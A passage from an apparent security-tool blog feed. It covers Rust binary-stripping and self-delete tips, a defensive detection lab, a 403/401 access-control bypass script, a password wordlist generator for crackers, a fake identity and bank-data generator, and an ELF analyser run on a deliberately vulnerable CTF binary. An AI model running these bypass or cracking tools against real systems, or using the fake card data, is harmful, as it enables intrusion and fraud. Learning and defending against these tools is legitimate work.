  • Even if you remove all debug symbols, rust can still keep references to your home directory in the binary. The only way I've found to remove this is to pass the following flag: --remap-path-prefix {your home directory}={some random identifier}. You can use bash variables to get your home directory and generate a random placeholder: --remap-path-prefix "$HOME"="$RANDOM". (By Yamakadi)
  • Although for the above there is another way to remove info about the home directory by adding at the top of Cargo.toml
    cargo-features = ["strip"] .
  • Since Rust by default leaves a lot of things as strings in the binary, I mostly use this cargo.toml to avoid them and also reduce size
    with build command
    cargo build --release -Z build-std=std,panic_abort -Z build-std-features=panic_immediate_abort --target x86_64-pc-windows-msvc

Other projects I have have made in Rust

Projects in Rust that can be hepfull

  • houdini - Helps make your executable self-delete


DetectionLabELK - A Fork From DetectionLab With ELK Stack Instead Of Splunk

28 November 2021 at 20:30
By: Zion3R


DetectionLabELK is a fork from Chris Long's DetectionLab with ELK stack instead of Splunk.


Description:

DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blueteams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.

Use cases:

A popular use case for DetectionLabELK is when you consider adopting MITRE ATT&CK framework and would like to develop detections for its tactics. You can use DetectionLabELK to quickly run atomic tests, see what logs are being generated and compare it to your production environment. This way you can:

  • Validate that your production logging is working as expected.
  • Ensure that your SIEM is collecting the correct events.
  • Enhance alerts quality by reducing false positives and eliminating false negatives.
  • Minimize coverage gaps.

Lab Information:

Primary Lab Features:

  • Microsoft Advanced Threat Analytics is installed on the WEF machine, with the lightweight ATA gateway installed on the DC
  • Windoes Evenet forwarder along with Winlogbeat are pre-installed and all indexes are pre-created on ELK. Technology add-ons for Windows are also preconfigured.
  • A custom Windows auditing configuration is set via GPO to include command line process auditing and additional OS-level logging
  • Palantir's Windows Event Forwarding subscriptions and custom channels are implemented
  • Powershell transcript logging is enabled. All logs are saved to \\wef\pslogs
  • osquery comes installed on each host and is pre-configured to connect to a Fleet server via TLS. Fleet is preconfigured with the configuration from Palantir's osquery Configuration
  • Sysmon is installed and configured using Olaf's open-sourced configuration
  • All autostart items are logged to Windows Event Logs via AutorunsToWinEventLog
  • SMBv1 Auditing is enabled

Lab Hosts:

  1. DC - Windows 2016 Domain Controller

    • WEF Server Configuration GPO
    • Powershell logging GPO
    • Enhanced Windows Auditing policy GPO
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards Sysmon & osquery)
    • Sysinternals Tools
    • Microsft Advanced Threat Analytics Lightweight Gateway
  2. WEF - Windows 2016 Server

    • Microsoft Advanced Threat Analytics
    • Windows Event Collector
    • Windows Event Subscription Creation
    • Powershell transcription logging share
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards WinEventLog & Powershell & Sysmon & osquery)
    • Sysinternals tools
  3. Win10 - Windows 10 Workstation

    • Simulates employee workstation
    • Sysmon
    • osquery
    • Sysinternals Tools
  4. Logger - Ubuntu 18.04

    • Kibana
    • Fleet osquery Manager
    • Bro
    • Suricata
    • Elastic Beats Forwarder (Forwards Bro logs & Suricata & osquery)
    • Guacamole
    • Velociraptor

Requirements

  • 55GB+ of free disk space
  • 16GB+ of RAM
  • Vagrant 2.2.2 or newer
  • Virtualbox

Deployment Options

  1. Use Vagrant Cloud Boxes - ETA ~2 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install the Vagrant-Reload plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK/Vagrant" and execute vagrant up.
  2. Build Boxes From Scratch - ETA ~5 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install "Vagrant-Reload" plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK" base directory and build the lab by executing ./build.sh virtualbox (Mac & Linux) or ./build.ps1 virtualbox (Windows).

Troubleshooting:

  • To verify that building process completed successfully, ensure you are in DetectionLabELK/Vagrant directory and run vagrant status. The four machines (wef,dc,logger and win10) should be running. if one of the machines was not running, execute vagrant reload <host>. If you would like to pause the whole lab, execute vagrant suspend and resume it using vagrant resume.
  • Deployment logs will be present in the Vagrant folder as vagrant_up_<host>.log

Lab Access:

Support: If you face any problem, please open a new issue and provide relevant log file.



4-ZERO-3 - 403/401 Bypass Methods + Bash Automation

28 November 2021 at 11:30
By: Zion3R


>_ Introduction

4-ZERO-3 Tool to bypass 403/401. This script contain all the possible techniques to do the same.

  • NOTE : If you see multiple [200 Ok]/bypasses as output, you must check the Content-Length. If the content-length is same for multiple [200 Ok]/bypasses means false positive. Reason can be "301/302" or "../" [Payload] DON'T PANIC.
  • Script will print cURL PAYLOAD if possible bypass found.

>_ Preview



>_ Help

[email protected]_dheeraj:$ bash 403-bypass.sh -h



Β 

>_ Usage / Modes

  • Scan with specific payloads:
    • [ --header ] Support HEADER based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --header
    • [ --protocol ] Support PROTOCOL based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --protocol
    • [ --port ] Support PORT based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --port
    • [ --HTTPmethod ] Support HTTP Method based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --HTTPmethod
    • [ --encode ] Support URL Encoded bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --encode
    • [ --SQLi ] Support MySQL mod_Security & libinjection bypasses/payloads [** New **]
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --SQLi
  • Complete Scan {includes all exploits/payloads} for an endpoint [ --exploit ]
[email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --exploit
Prerequisites
  • apt install curl [Debian]


Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool

27 November 2021 at 20:30
By: Zion3R

Cracken is a fast password wordlist generator, Smartlist creation and password hybrid-mask analysis tool written in pure safe Rust (more on talk/). Inspired by great tools like maskprocessor, hashcat, Crunch and

ο€— HuggingFace's tokenizers.

What? Why? Woot??

At DeepSec2021 we presented a new method for analysing passwords as Hybrid-Masks exploiting common substrings in passwords by utilizing NLP tokenizers (more info on talk/).

Our method splits a password into its subwords instead of just a characters mask. HelloWorld123! splitted into ['Hello', 'World', '123!'] as these three subwords are very common in other passwords.

Hybrid Masks & Smartlists

  • Smartlists - Compact & representative subword lists created from passwords by utilizing NLP tokenizers
  • Hybrid-Mask - A representation of a password as a combination of wordlists & characters (e.g. ?w1?w2?l?d)

Analyzing RockYou Passwords with Smartlists & Hybrid-Masks:

full table here

Cracken

is used for:

  • Generating Hybrid-Masks very VERY FAST ο¦Έ (see performance section)
  • Building Smartlists - compact & representative list of subwords from given passwords files (using ο€— HuggingFace's tokenizers)
  • Analyzing passwords for their Hybrid-Masks - building statistics for better password candidates (again very fast)

Possible workflows with Cracken:

Simple:

  1. Generate wordlist candidates from a hybrid mask - e.g. cracken -w rockyou.txt -w 100-most-common.txt '?w1?w2?d?d?d?d?s'
  2. You can pipe the passwords Cracken generates into hashcat, john or your favorite password cracker

Advanced:

  1. Create a Smartlist from existing passwords - cracken create
  2. Analyze a passwords list of plaintext passwords - cracken entropy
  3. use most frequent Hybrid-Masks to generate password candidates fast - cracken generate -i hybrid-masks.txt

For more details see Usage section

Getting Started

download (linux only currently): latest release

for more installation options see installation section

run Cracken:

generate all words of length 8 starting with uppercase followed by 6 lowercase chars and then a digit:

$ cracken -o pwdz.lst '?u?l?l?l?l?l?l?d'

generate words from two wordlists with year suffix (1000-2999) <firstname><lastname><year>

$ cracken --wordlist firstnames.txt --wordlist lastnames.lst --charset '12' '?w1?w2?1?d?d?d'

create a Smartlist of size 50k from subwords extracted from rockyou.txt

$ cracken create -f rockyou.txt -m 50000 --smartlist smart.lst

estimate the entropy of hybrid mask of the password HelloWorld123! using a smartlist

$ cracken entropy -f smart.lst 'HelloWorld123!'

hybrid-min-split: ["hello", "world1", "2", "3", "!"]
hybrid-mask: ?w1?w1?d?d?s
hybrid-min-entropy: 42.73
--
charset-mask: ?l?l?l?l?l?l?l?l?l?l?d?d?d?s
charset-mask-entropy: 61.97

Performance

As of writing this, Cracken is probably the world's fastest wordlist generator:



Cracken has around 25% increased performance over hashcat's fast maskprocessor thats written in C.

Cracken can generate around 2 GB/s per core.

more details on benchmarks/

Why speed is important? A typical GPU can test billions passwords per second depending on the password hash function. When the wordlist generator produces fewer words per second than the cracking tool can handle - the cracking speed will degrade.

Hybrid-Masks Analysis Performance

Cracken uses A* algorithm to analyze passwords very fast. it can find the minimal Hybrid-Mask of passwords file at rate of ~100k Passwords/sec (cracken entropy -f words1.txt -f words2.txt ... -p pwds.txt)

Installation

install Cracken or compile from source

Download Binary (Linux Only Currently)

download latest release from releases

Build From Source (All Platforms)

Cracken is written in Rust and needs rustc to get compiled. Cracken should support all Platforms that Rust support.

installation instructions for cargo

there are two options building from source - installing with cargo from crates.io (preferred) or compiling manually from source.

1. install from crates.io (preferred)

install with cargo:

$ cargo install cracken

2. build from source

clone Cracken:

$ git clone https://github.com/shmuelamar/cracken

build Cracken:

$ cd cracken
$ cargo build --release

run it:

$ ./target/release/cracken --help

Usage Info

generator USAGE: cracken [SUBCOMMAND] FLAGS: -h, --help Prints help information -V, --version Prints version information SUBCOMMANDS: generate (default) - Generates newline separated words according to given mask and wordlist files create Create a new smartlist from input file(s) entropy Computes the estimated entropy of password or password file. The entropy of a password is the log2(len(keyspace)) of the password. There are two types of keyspace size estimations: * mask - keyspace of each char (digit=10, lowercase=26...). * hybrid - finding minimal split into subwords and charsets. For specific subcommand help run: cracken <subcommand> --help Example Usage: ## Generate Subcommand Examples: # all digits from 00000000 to 99999999 cracken ?d?d?d?d?d?d?d?d # all digits from 0 to 99999999 cracken -m 1 ?d?d?d?d?d?d?d?d # words with pwd prefix - pwd0000 to pwd9999 cracken pwd?d?d?d?d # all passwords of length 8 starting with upper then 6 lowers then digit cracken ?u?l?l?l?l?l?l?d # same as above, write output to pwds.txt instead of stdout cracken -o pwds.txt ?u?l?l?l?l?l?l?d # custom charset - all hex values cracken -c 0123456789abcdef '?1?1?1?1' # 4 custom charsets - the order determines the id of the charset cracken -c 01 -c ab -c de -c ef '?1?2?3?4' # 4 lowercase chars with years 2000-2019 suffix cracken -c 01 '?l?l?l?l20?1?d' # starts with firstname from wordlist followed by 4 digits cracken -w firstnames.txt '?w1?d?d?d?d' # starts with firstname from wordlist with lastname from wordlist ending with symbol cracken -w firstnames.txt -w lastnames.txt -c '[email protected]#$' '?w1?w2?1' # repeating wordlists multiple times and combining charsets cracken -w verbs.txt -w nouns.txt '?w1?w2?w1?w2?w2?d?d?d' ## Create Smartlists Subcommand Examples: # create smartlist from single file into smart.txt cracken create -f rockyou.txt --smartlist smart.txt # create smartlist from multiple files with multiple tokenization algorithms cracken create -t bpe -t unigram -t wordpiece -f rockyou.txt -f passwords.txt -f wikipedia.txt --smartlist smart.txt # create smartlist with minimum subword length of 3 and max numbers-only subwords of size 6 cracken create -f rockyou.txt --min-word-len 3 --numbers-max-size 6 --smartlist smart.txt ## Entropy Subcommand Examples: # estimating entropy of a password cracken entropy --smartlist vocab.txt 'helloworld123!' # estimating entropy of a passwords file with a charset mask entropy (default is hybrid) cracken entropy --smartlist vocab.txt -t charset -p passwords.txt # estimating the entropy of a passwords file cracken entropy --smartlist vocab.txt -p passwords.txt cracken-v1.0.0 linux-x86_64 compiler: rustc 1.56.1 (59eed8a2a 2021-11-01) more info at: https://github.com/shmuelamar/cracken ">
$ cracken --help
Cracken v1.0.0 - a fast password wordlist generator

USAGE:
cracken [SUBCOMMAND]

FLAGS:
-h, --help Prints help information
-V, --version Prints version information

SUBCOMMANDS:
generate (default) - Generates newline separated words according to given mask and wordlist files
create Create a new smartlist from input file(s)
entropy
Computes the estimated entropy of password or password file.
The entropy of a password is the log2(len(keyspace)) of the password.

There are two types of keyspace size estimations:
* mask - keyspace of each char (digit=10, lowercase=26...).
* hybrid - finding minimal split into subwords and charsets.


For specific subcommand help run: cracken <subcommand> --help


Example U sage:

## Generate Subcommand Examples:

# all digits from 00000000 to 99999999
cracken ?d?d?d?d?d?d?d?d

# all digits from 0 to 99999999
cracken -m 1 ?d?d?d?d?d?d?d?d

# words with pwd prefix - pwd0000 to pwd9999
cracken pwd?d?d?d?d

# all passwords of length 8 starting with upper then 6 lowers then digit
cracken ?u?l?l?l?l?l?l?d

# same as above, write output to pwds.txt instead of stdout
cracken -o pwds.txt ?u?l?l?l?l?l?l?d

# custom charset - all hex values
cracken -c 0123456789abcdef '?1?1?1?1'

# 4 custom charsets - the order determines the id of the charset
cracken -c 01 -c ab -c de -c ef '?1?2?3?4'

# 4 lowercase chars with years 2000-2019 suffix
cracken -c 01 '?l?l?l?l20?1?d'

# starts with firstname from wordlist followed by 4 digits
cracken -w firstnames.txt '?w1?d?d?d?d'

# starts with firstname from wordlist with lastname from wordlist ending with symbol
cracken -w firstnames.txt -w lastnames.txt -c '[email protected]#$' '?w1?w2?1'

# repeating wordlists multiple times and combining charsets
cracken -w verbs.txt -w nouns.txt '?w1?w2?w1?w2?w2?d?d?d'


## Create Smartlists Subcommand Examples:

# create smartlist from single file into smart.txt
cracken create -f rockyou.txt --smartlist smart.txt

# create smartlist from multiple files with multiple tokenization algorithms
cracken create -t bpe -t unigram -t wordpiece -f rockyou.txt -f passwords.txt -f wikipedia.txt --smartlist smart.txt

# create smartlist with minimum subword length of 3 and max numbers-only subwords of size 6
cracken create -f rockyou.txt --min-word-len 3 --numbers-max-size 6 --smartlist smart.txt


## Entropy Subcommand Examples:

# estimating entropy of a password
cracken entropy --smartlist vocab.txt 'helloworld123!'

# estimating entropy of a passwords file with a charset mask entropy (default is hybrid)
cracken entropy --smartlist vocab.txt -t charset -p passwords.txt

# estimating the entropy of a passwords file
cracken entropy --smartlist vocab.txt -p passwords.txt

cracken-v1.0.0 linux-x86_64 compiler: rustc 1.56.1 (59eed8a2a 2021-11-01)
more info at: https://github.com/shmuelamar/cracken

Generate Subcommand Usage Info

$ cracken generate --help
cracken-generate
(default) - Generates newline separated words according to given mask and wordlist files

USAGE:
cracken generate [FLAGS] [OPTIONS] <mask> --masks-file <masks-file>

FLAGS:
-h, --help
Prints help information

-s, --stats
prints the number of words this command will generate and exits

-V, --version
Prints version information


OPTIONS:
-c, --custom-charset <custom-charset>...
custom charset (string of chars). up to 9 custom charsets - ?1 to ?9. use ?1 on the mask for the first charset

-i, --masks-file <masks-file>
a file containing masks to generate

-x, --maxlen <max-length>
maximum length of the mask to start from

-m, --minlen & lt;min-length>
minimum length of the mask to start from

-o, --output-file <output-file>
output file to write the wordlist to, defaults to stdout

-w, --wordlist <wordlist>...
filename containing newline (0xA) separated words. note: currently all wordlists loaded to memory


ARGS:
<mask>
the wordlist mask to generate.
available masks are:
builtin charsets:
?d - digits: "0123456789"
?l - lowercase: "abcdefghijklmnopqrstuvwxyz"
?u - uppercase: "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
?s - symbols: " !\"\#$%&'()*+,-./:;<=>[email protected][\\]^_`{|}~"
?a - all characters: ?d + ?l + ?u + ?s
?b - all binary values: (0-255)

custom charset s ?1 to ?9:
?1 - first custom charset specified by --charset 'mychars'

wordlists ?w1 to ?w9:
?w1 - first wordlist specified by --wordlist 'my-wordlist.txt'

Create Smartlist Subcommand Usage Info

$ cracken create --help  
cracken-create
Create a new smartlist from input file(s)

USAGE:
cracken create [FLAGS] [OPTIONS] --file <file>... --smartlist <smartlist>

FLAGS:
-h, --help Prints help information
-q, --quiet disables printing progress bar
-V, --version Prints version information

OPTIONS:
-f, --file <file>... input filename, can be specified multiple times for multiple files
--min-frequency <min_frequency> minimum frequency of a word, relevant only for BPE tokenizer
-l, --min-word-len <min_word_len> filters words shorter than the specified length
--numbers-max-size <numbers_max_size> filters numbers (all digits) longer than the specified size
-o, --smartlist <smartlist> output smartlist filename
-t, --tokenizer <tokeniz er>... tokenizer to use, can be specified multiple times.
one of: bpe,unigram,wordpiece [default: bpe] [possible values: bpe, unigram, wordpiece]
-m, --vocab-max-size <vocab_max_size> max vocabulary size

Entropy Subcommand Usage Info

$ cracken entropy --help
cracken-entropy

Computes the estimated entropy of password or password file.
The entropy of a password is the log2(len(keyspace)) of the password.

There are two types of keyspace size estimations:
* mask - keyspace of each char (digit=10, lowercase=26...).
* hybrid - finding minimal split into subwords and charsets.


USAGE:
cracken entropy [FLAGS] [OPTIONS] <password> --smartlist <smartlist>...

FLAGS:
-h, --help Prints help information
-s, --summary output summary of entropy for password
-V, --version Prints version information

OPTIONS:
-t, --mask-type <mask_type> type of mask to output, one of: charsets(charsets only), hybrid(charsets+wordlists) [possible values: hybrid, charset]
-p, --passwords-file <passwords-file> newline separated password file to estimate entropy for
-f, --smartlist <smartlist>... smartlist input file to estimate entropy with, a newline separated text file

ARGS:
<password> password to

License

Cracken is licensed under MIT. THIS PROJECT MUST BE USED FOR LEGAL PURPOSES ONLY


Contributing

Cracken is under active development, if you wish to help below is this the partial roadmap for this project. Feel free to submit PRs and open issues.



FakeDataGen - Full Valid Fake Data Generator

27 November 2021 at 11:30
By: Zion3R


FakeDataGen is a Full Valid Fake Data Generator.

This tool helps you to create fake accounts (in Spanish format) with fully valid data. Within this information, you can find the most common names, emails, bank details and other useful information.


Requirements

  • Python 3
  • Install requirements.txt

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/FakeDataGen

Usage

./FakeDataGen.py -h

_____ _ ____ _ ____
| ___|_ _| | _ ___| _ \ __ _| |_ __ _ / ___| ___ _ __
| |_ / _` | |/ / _ \ | | |/ _` | __/ _` | | _ / _ \ '_ \
| _| (_| | < __/ |_| | (_| | || (_| | |_| | __/ | | |
|_| \__,_|_|\_\___|____/ \__,_|\__\__,_|\____|\___|_| |_|

-------------------- by @JoelGMSec ---------------------

usage: FakeDataGen.py [-h] [-n NUMBER] [-b] [-e] [-f FILE] [-z] [-p PASSWORD]

optional arguments:
-h, --help show this help message and exit
-n NUMBER, --number NUMBER
The number of records should be created
-b, --bankdata Show only bank data (Card, CVV, IBAN..)
-e, --extended Show only extended info (City, Phone, SS..)
-f FILE, --file FILE File path to save data
-z, --zip Compress data to zip file
-p PASSWORD, --password PASSWORD
Password to protect zip file

The detailed guide of use can be found at the following link:

https://darkbyte.net/generando-datos-falsos-con-fakedatagen

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This script has been created and designed from scratch by Joel GΓ‘mez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



ELFXtract - An Automated Analysis Tool Used For Enumerating ELF Binaries

26 November 2021 at 20:30
By: Zion3R


ELFXtract is an automated analysis tool used for enumerating ELF binaries

Powered by Radare2 and r2ghidra

This is specially developed for PWN challenges and it has many automated features

It almost displays every details of the ELF and also decompiles its ASM to C code using r2ghidra

Decompiling ELFs in Ghidra takes more time, but in elfxtract it decompiles and displays in few seconds


Features in ELFXtract

  1. File info
  2. Shared object dependency details
  3. ELF Security Mitigation details / Checksec
  4. String details
  5. Header memory map
  6. ROP gadgets
  7. PLT Table
  8. GOT Table
  9. Function Table
  10. ASM code of functions
  11. Decompiled code of functions
  12. Predicting possible vulnerable functions

Installation

git clone https://github.com/AidenPearce369/elfxtract
cd elfxtract
chmod +x install.sh
./install.sh
pip install -r requirements.txt

Working

You can run elfxtract with any ELF along with -a to list all details from the ELF

Decompiler type: undefined8 main(void) { undefined8 s; sym.imp.puts("Enter your name"); sym.imp.gets(&s); sym.imp.printf("Your name is "); sym.imp.puts(&s); return 0; } *************************************************************************** > VULNERABLE FUNCTIONS : Possible vulnerability locations - Command Execution 0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string) Possible vulnerability locations - Format String 0x000011bd e8defeffff call sym.imp.printf ; int printf(const char *format) 0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format) Possible vulnerability locations - Buffer Overflow 0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s) *************************************************************************** ">
[email protected]:~/elfxtract$ python3 main.py --file programvuln -a

_____ _ ________ ___ _
| ___| | | ___\ \ / / | | |
| |__ | | | |_ \ V /| |_ _ __ __ _ ___| |_
| __|| | | _| / \| __| '__/ _` |/ __| __|
| |___| |____| | / /^\ \ |_| | | (_| | (__| |_
\____/\_____/\_| \/ \/\__|_| \__,_|\___|\__|

@aidenpearce369

***************************************************************************

> FILE INFO :

ELF Name : programvuln
ELF Type : ELF 64-bit LSB shared object
ELF Arch : x86-64
ELF SHA1 Hash : BuildID[sha1]=cf149d97ad1e895561080b1f5c317bc5bc1e8652

This binary is dynamically linked & not stripped

********************** *****************************************************

> SHARED OBJECT DEPENDENCY :

linux-vdso.so.1 (0x00007ffd525a4000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd610d93000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd610fa1000)

***************************************************************************

> ELF SECURITY MITIGATIONS :

RELRO : Full RELRO
STACK CANARY : No Canary found
NX BIT : NX disabled
PIE : PIE enabled
RPATH : No RPATH
RUNPATH : No RUNPATH

***************************************************************************

> POSSIBLE STRINGS :

nth paddr vaddr len size section type string
―――――――――――――――――――――――& #8213;―――――――――――――――――――――――――――――――
0 0x00002008 0x00002008 31 32 .rodata ascii You have bypassed this function
1 0x00002028 0x00002028 12 13 .rodata ascii cat flag.txt
2 0x00002035 0x00002035 15 16 .rodata ascii Enter your name
3 0x00002045 0x00002045 13 14 .rodata ascii Your name is

***************************************************************************

> RODATA HEXDUMP :

0x00002000 01000200 00000000 596f7520 68617665 ........You have
0x00002010 20627970 61737365 64207468 69732066 bypassed this f
0x00002020 756e6374 696f6e00 63617420 666c6167 unction.cat flag
0x00002030 2e747874 00456e74 65722079 6f757220 .txt.Enter your
0x00002040 6e616d65 00596f75 72206e61 6d652069 name.Your name i
0x00002050 732000 s .


***************************************************************************

> ELF ENTRY POINT :

The entry point of the ELF is at 0x10c0

***************************************************************************

> HEADER MEMORY MAP :

Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x00000000000002d8 0x00000000000002d8 R 0x8
INTERP 0x0000000000000318 0x0000000000000318 0x0000000000000318
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x00000000000006a8 0x00000000000006a8 R 0x1000
LOAD 0x0000000000001000 0x0000000000001000 0x0000000000001000
0x00000000000002b5 0x00000000000002b5 R E 0x1000
LOAD 0x0000000000002000 0x0000000000002000 0x0000000000002000
0x00000000000001c8 0x00000000000001c8 R 0x1000
LOAD 0x0000000000002da0 0x0000000000003da0 0x0000000000003da0
0x0000000000000270 0x0000000000000278 RW 0x1000
DYNAMIC 0x0000000000002db0 0x0000000000003db0 0x0000000000003db0
0x00000000000001f0 0x00000000000001f0 RW 0x8
NOTE 0x0000000000000338 0x0000000000000338 0x0000000000000338
0x0000000000000020 0x0000000000000020 R 0x8
NOTE 0x0000000000000358 0x0000000000000358 0x0000000000000358
0x0000000000000044 0x0000000000000044 R 0x4
GNU_PROPERTY 0x000000000 0000338 0x0000000000000338 0x0000000000000338
0x0000000000000020 0x0000000000000020 R 0x8
GNU_EH_FRAME 0x0000000000002054 0x0000000000002054 0x0000000000002054
0x000000000000004c 0x000000000000004c R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RWE 0x10
GNU_RELRO 0x0000000000002da0 0x0000000000003da0 0x0000000000003da0
0x0000000000000260 0x0000000000000260 R 0x1

***************************************************************************
[*] Loaded 14 cached gadgets for 'programvuln'

> ROP GADGETS :

0x1017 : add esp, 8;ret
0x1016 : add rsp, 8;ret
0x1221 : leave;ret
0x128c : pop r12;pop r13;pop r14;pop r15;ret
0x128e : pop r13;pop r14;pop r15;ret
0x1290 : pop r14;pop r15;ret
0x12 92 : pop r15;ret
0x128b : pop rbp;pop r12;pop r13;pop r14;pop r15;ret
0x128f : pop rbp;pop r14;pop r15;ret
0x1193 : pop rbp;ret
0x1293 : pop rdi;ret
0x1291 : pop rsi;pop r15;ret
0x128d : pop rsp;pop r13;pop r14;pop r15;ret
0x101a : ret

***************************************************************************

> PLT TABLE :

__cxa_finalize : 0x1074
puts : 0x1084
system : 0x1094
printf : 0x10a4
gets : 0x10b4

***************************************************************************

> GOT TABLE :

_ITM_deregisterTMCloneTable : 0x3fd8
__libc_start_main : 0x3fe0
__gmon_start__ : 0x3fe8
_ITM_registerTMCloneTable : 0x3ff0
__cxa_finalize : 0x3ff8
puts : 0x3fb8
system : 0x3fc0
printf : 0x3fc8
gets : 0x3fd0

***************************************************************************

> FUNCTION TABLE :

__libc_csu_fini : 0x12a0
__libc_csu_init : 0x1230
win : 0x11a9
_start : 0x10c0
main : 0x11d6

***************************************************************************

> POSSIBLE USER DEFINED FUNCTIONS :

win : 0x11a9
main : 0x11d6

***************************************************************************

> ASSEMBLY AND DECOMPILED CODE :


[*] ASM - win :

β”Œ 45: sym.win ();
β”‚ 0x000011a9 f30f1efa endbr64
β”‚ 0x000011ad 55 push rbp
β”‚ 0x000011ae 4889e5 mov rbp, rsp
β”‚ 0x000011b1 488d3d500e00. lea rdi, str.You_have_bypassed_this_function ; 0x2008 ; "You have bypassed this function" ; const char *format
β”‚ 0x000011b8 b800000000 mov eax, 0
β”‚ 0x000011bd e8defeffff call sym.imp.printf ; int printf(const char *format)
β”‚ 0x000011c2 488d3d5f0e00. lea rdi, str.cat_flag.txt ; 0x2028 ; "cat flag.txt" ; const char *string
β”‚ 0x000011c9 b800000000 mov eax, 0
β”‚ 0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string)
β”‚ 0x000011d3 90 nop
β”‚ 0x000011d4 5d pop rbp
β”” 0x000011d5 c3 ret

[*] DECOMPILED CODE - win :

void sym.win(void)

{
sym.imp.printf("You have bypassed this function");
sym.imp.system("cat flag.txt");
return;
}

[*] ASM - main :

; DATA XREF from entry0 @ 0x10e1
β”Œ 77: int main (int argc, char **argv, char **envp);
β”‚ ; var char *s @ rbp-0x40
β”‚ 0x000011d6 f30f1efa endbr64
β”‚ 0x000011da 55 push rbp
β”‚ 0x000011db 4889e5 mov rbp, rsp
β”‚ 0x000011de 4883ec40 sub rsp, 0x40
β”‚ 0x000011e2 488d3d4c0e00. lea rdi, str.Enter_your_name ; 0x2035 ; "Enter your name" ; const char *s
β”‚ 0x000011e9 e892feffff call sym.imp.puts ; int puts(const char *s)
β”‚ 0x000011ee 488d45c0 lea rax, [s]
β”‚ 0x000011f2 4889c7 mov rdi, rax ; char *s
β”‚ 0x000011f5 b800000000 mov eax, 0
β”‚ 0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s)
β”‚ 0x000011ff 488d3d3f0e00. lea rdi, str.Your_name_is_ ; 0x2045 ; "Your name is " ; const char *format
β”‚ 0x00001206 b800000000 mov eax, 0
β”‚ 0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format)
β”‚ 0x00001210 488d45c0 lea rax, [s]
β”‚ 0x00001214 4889c7 mov rdi, rax ; const char *s
β”‚ 0x00001217 e864feffff call sym.imp.puts ; int puts(const char *s)
β”‚ 0x 0000121c b800000000 mov eax, 0
β”‚ 0x00001221 c9 leave
β”” 0x00001222 c3 ret

[*] DECOMPILED CODE - main :

// WARNING: [r2ghidra] Failed to match type char * for variable s to Decompiler type:

undefined8 main(void)

{
undefined8 s;

sym.imp.puts("Enter your name");
sym.imp.gets(&s);
sym.imp.printf("Your name is ");
sym.imp.puts(&s);
return 0;
}

***************************************************************************

> VULNERABLE FUNCTIONS :

Possible vulnerability locations - Command Execution

0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string)

Possible vulnerability locations - Format String

0x000011bd e8defeffff call sym.imp.printf ; int printf(const char * format)
0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format)

Possible vulnerability locations - Buffer Overflow

0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s)


***************************************************************************

You can also pass arguments and get the info based on your needs,

[email protected]:~/elfxtract$ python3 main.py -h

_____ _ ________ ___ _
| ___| | | ___\ \ / / | | |
| |__ | | | |_ \ V /| |_ _ __ __ _ ___| |_
| __|| | | _| / \| __| '__/ _` |/ __| __|
| |___| |____| | / /^\ \ |_| | | (_| | (__| |_
\____/\_____/\_| \/ \/\__|_| \__,_|\___|\__|

@aidenpearce369

***************************************************************************
usage: main.py [-h] -f FILE [-a] [-i] [-g] [--user-func] [--get-func GET_FUNC] [--asm-only]
[--decompiled-only] [-t]

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE Path of the ELF
-a, --all Extract all info
-i, --info Displays bas ic info
-g, --gadgets Displays gadgets
--user-func Displays the details of user defined functions
--get-func GET_FUNC Displays the ASM & decompiled code of the given function
--asm-only Displays the ASM of ELF
--decompiled-only Displays the decompiled C code of ELF
-t, --tables Displays PLT, GOT & Function table

Updates

elfxtract is fully developed for parsing PWN binaries,

Soon, it will be added with new features to analyse system binaries

